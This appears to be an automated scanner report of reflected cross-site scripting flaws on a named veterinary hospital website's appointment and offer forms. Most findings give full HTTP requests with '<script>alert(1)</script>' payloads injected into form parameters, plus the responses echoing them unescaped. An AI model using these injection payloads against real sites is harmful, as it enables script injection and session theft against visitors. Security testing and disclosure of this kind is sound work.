Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="appt54666"><a>31d8f105f44">
...[SNIP]...

2.3. http://www.vcahospitals.com/hanson/appt.html [altphone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the altphone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 624cd"><script>alert(1)</script>82000bb6032 was submitted in the altphone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=624cd"><script>alert(1)</script>82000bb6032&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d20
5&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submi
t%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:16 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4udruo5a6bh9ud6vq7kq83b113; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="altphone" id="altphone" type="text" size="30" maxlength="20" value="624cd"><script>alert(1)</script>82000bb6032" />
...[SNIP]...

2.4. http://www.vcahospitals.com/hanson/appt.html [ampm1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the ampm1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bae55"><script>alert(1)</script>803b193c3aa was submitted in the ampm1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=&ampm1=AMbae55"><script>alert(1)</script>803b193c3aa&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d20
5&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submi
t%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:21 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=cr4nhjr58mse15chetc65pdm60; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AMbae55"><script>alert(1)</script>803b193c3aa&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2
...[SNIP]...

2.5. http://www.vcahospitals.com/hanson/appt.html [ampm2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the ampm2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddea7"><script>alert(1)</script>769a3fc6d44 was submitted in the ampm2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AMddea7"><script>alert(1)</script>769a3fc6d44&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d20
5&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submi
t%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mig2fnj5prvum7phmej9acrtd7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AM&ampm2=AMddea7"><script>alert(1)</script>769a3fc6d44&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.v
...[SNIP]...

2.6. http://www.vcahospitals.com/hanson/appt.html [ampm3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The value of the ampm3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a25b"><script>alert(1)</script>18b15d79637 was submitted in the ampm3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM2a25b"><script>alert(1)</script>18b15d79637&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d20
5&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submi
t%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=795pv82b0poc4jb53dq6ne47c3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM2a25b"><script>alert(1)</script>18b15d79637&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospita
...[SNIP]...

2.7. http://www.vcahospitals.com/hanson/appt.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 994c2"><script>alert(1)</script>860b1adcd7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/appt.html?994c2"><script>alert(1)</script>860b1adcd7c=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html?994c2"><script>alert(1)</script>860b1adcd7c=1" />
...[SNIP]...

2.8. http://www.vcahospitals.com/hanson/offer.html [addr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 998d7"><script>alert(1)</script>24a59a02e19 was submitted in the addr parameter. This input was echoed unmodified in the application's response.

